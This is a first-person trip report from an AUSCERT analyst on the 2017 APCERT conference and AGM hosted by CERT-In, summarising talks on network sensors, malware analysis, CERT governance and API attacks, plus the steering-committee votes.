When the conference registration opened on Sunday morning, I began meeting delegates from other APCERT members. I noticed immediately that everyone was friendly, relaxed, and very welcoming. The APCERT community is small and close-knit, and for some long-time members, the conferences are just as much of a catch-up session as they are a business trip. Apparently some of AUSCERT's staff are quite famous in the APCERT community, as I received quite a few queries regarding some of my colleagues!

All of the APCERT members are working towards the same goal – to protect their economies or industry sectors from new and existing cyber threats. As we are largely government-funded or non-profit organisations, there is no pressure to create profits or sell products, and the focus is entirely on providing the best possible service to our jurisdictions. Some of the teams that participate in APCERT are quite small and do not have the resources to analyse all new threats, so collaboration amongst teams is extremely beneficial.

In addition to the welcoming atmosphere among APCERT members, the hospitality and kindness shown by CERT-In was second-to-none. This year was the first time they had hosted the APCERT conference, but the experience was extremely smooth and well-thought out. During the afternoon of the first day, we were taken on a guided tour of local sights by the CERT-In staff, before being presented with a welcome dinner. Having helped run the AUSCERT conference in the past, I know how difficult and stressful it can be to run such an event, and I commend CERT-In on their performance.

Conference Proceedings and Talks

The conference began with updates from the various working groups within APCERT. This is a great way to share progress with other members, and some of the work presented by teams this year was extremely impressive. One such example is the TSUBAME project, which collects network traffic data from passive "sensors" situated in many networks across the Asia-Pacific region, and compiles that data into statistics that can be used to observe trends in network scans across the internet.

Other talks focused on issues such as automated malware analysis, in particular the need for non-commercial options that can be used with potentially sensitive information. A talk given by Wen-Ling Lo from TWCERT/CC brought up an excellent point: many people use services such as VirusTotal or VirScan to check suspicious email attachments, but if the attachment is legitimate and contains confidential information, uploading it to a commercial company's services could result in an information leak. TWCERT/CC are currently developing a tool that can be used by businesses and governments in Taiwan to examine files without fear that samples will be sent to external or commercial companies. AUSCERT is very impressed with their efforts and will be tracking their progress closely.

Not all talks were technical, though, and an unexpectedly impactful presentation by Nurul Husna of MyCERT, the national CERT for Malaysia, described the governance and management workflows required to operate a CERT efficiently. As a technical person, it was refreshing to see a presentation on governance that made sense and showed real value. There is a real need for efficient management of resources at CERTs, due to the quick turnaround time required in order to serve our jurisdictions effectively.

Additionally, some external speakers were invited to give talks at the conference. Some highlights included a talk by Akamai representative Amol Mathur on attacks that target API services directly, bypassing many of the protections that are built into front-end applications, and an overview on using machine learning to analyse malware samples by Rajesh Nikam of Quick Heal. As malware campaigns grow in both size and number, we need to move away from manual analysis in order to process as many samples as possible, making use of technologies such as machine learning to automate the process.

On the final day of the conference, attendance was opened to external members of the IT industry, and the National Minister for IT & Electronics gave an address to the audience. During the conference I began to see just how large and important the IT industry in India is. With a population of over 1 billion people, internet-based solutions are essential to interacting with the government and businesses, and ensuring these interactions are protected and non-fraudulent is a problem at the forefront of the industry. The conference also served as a focus point for the local government to draw attention to emerging threats, especially as they begin to move towards more digital payment solutions.

The full schedule for the APCERT Annual General Meeting and Conference may be found here: https://apcert2017.in/schedule.html

The APCERT AGM

Another important part of the conference is the Annual General Meeting, or AGM. At the AGM, proposals for changes and amendments to APCERT frameworks and guidelines are put forward and voted upon by members. Proposals for new working groups are also heard, and lastly, the membership of the steering committee and leadership positions are voted upon.

This year, CERT-In was accepted as a new member of the steering committee, and after recognising the hard work of JPCERT/CC, MyCERT, and CERT Australia in their positions as Secretariat, Deputy Chair, and Chair respectively, the members of APCERT voted to re-appoint them to their previous positions. AUSCERT would like to thank the steering committee and leadership positions for their hard work in the past year, and congratulate them on their continued appointments. We also welcome CERT-In to the steering committee and look forward to their input in the future!

Closing Remarks

Attending the APCERT conference and AGM was an eye-opening experience. In the fast-moving world of Information Security, we are facing attacks in greater numbers and greater complexity. It can be difficult to sift through the vast amounts of information distributed throughout the internet, trying to find advice that is truthful, accurate, and relevant to your organisation. CERT and CSIRT organisations offer an increasingly important role in these times, distributing threat intelligence efficiently and with the goal of national/sectorial security in mind. As well, the challenges faced by each CERT are often similar, and there is great value in being able to speak freely with other organisations that share your goals.

I would like to thank all of the members, partners, and guests at the conference, for welcoming me to the APCERT community. I've made many new friends over the last week, and hearing other analysts describe their experiences, challenges and achievements has re-invigorated my love for information security. I hope AUSCERT can continue to provide value to other APCERT members and look forward to some new collaborations in the future.

I would also like to offer a special thank-you to the staff of CERT-In, for being such hospitable hosts. My first stay in India was a great experience, and I hope to return in the future.

Anthony Vaccaro
anthony@auscert.org.au
